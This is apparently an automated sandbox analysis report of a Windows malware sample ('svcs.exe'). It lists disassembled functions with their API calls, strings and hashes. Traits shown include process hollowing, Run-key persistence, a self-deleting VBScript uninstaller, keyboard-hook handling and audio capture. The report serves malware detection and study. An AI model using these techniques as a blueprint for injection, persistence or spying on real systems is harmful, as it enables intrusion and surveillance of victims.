                                • Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D420 Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 282registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-2780701618
                                • Opcode ID: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: b551f3b2373885e39556138e865b175cc3d4ae26f9f03a76750746f939b0c8d9
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D096 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2616068718
                                • Opcode ID: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 20ad542f7171711714ea231336f0bfedc48dcef2d82ad876a4b4a36a3752c16a
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 146091e80e50a3233eb3da91dc212e53ef431cc0dfb42efe393cf7564aaa5dfb
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 146091e80e50a3233eb3da91dc212e53ef431cc0dfb42efe393cf7564aaa5dfb
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 6950fa60c67da0165606eeaae49d0d75b99f3a8629193b9fdbb0be8d76f71a2c
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 6950fa60c67da0165606eeaae49d0d75b99f3a8629193b9fdbb0be8d76f71a2c
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-2831364869
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                • API String ID: 3899193279-0
                                • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
